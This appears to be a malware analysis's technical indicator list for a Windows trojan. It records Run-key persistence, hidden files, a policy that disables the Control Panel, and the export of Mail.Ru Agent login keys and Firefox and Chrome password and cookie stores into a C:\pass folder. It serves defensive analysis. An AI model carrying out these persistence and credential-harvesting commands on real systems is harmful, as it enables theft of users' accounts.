Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'wco' = '%WINDIR%\wco.exe'
- <SYSTEM32>\attrib.exe +a +s +h +r %WINDIR%\rar.exe
- <SYSTEM32>\attrib.exe +a +s +h +r %WINDIR%\otpr.vbs
- <SYSTEM32>\attrib.exe +a +s +h +r %WINDIR%\wco.exe
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "wco" /t REG_SZ /d "%WINDIR%\wco.exe" /f
- <SYSTEM32>\attrib.exe +a +s +h +r %WINDIR%\iwco.exe
- <SYSTEM32>\xcopy.exe Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y
- <SYSTEM32>\attrib.exe C:\pass +h +s +r
- <SYSTEM32>\attrib.exe %WINDIR%\wincs +h +s +r
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\wind2.bat" "
- <SYSTEM32>\xcopy.exe Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E
- %WINDIR%\regedit.exe -ea C:\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3
- %WINDIR%\regedit.exe -ea C:\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- C:\pass\Mozilla\signons.sqlite
- C:\pass\Chrome\cookies.sqlite
- C:\pass\Mozilla\key3.db
- %TEMP%\1.tmp\wind2.bat
- C:\pass\Mozilla\cookies.sqlite
- C:\pass\Mozilla\signons.sqlite
- %TEMP%\1.tmp\wind2.bat
- C:\pass\Mozilla\key3.db
- C:\pass\Chrome\cookies.sqlite
- C:\pass\Mozilla\cookies.sqlite
- ClassName: 'RegEdit_RegEdit' WindowName: ''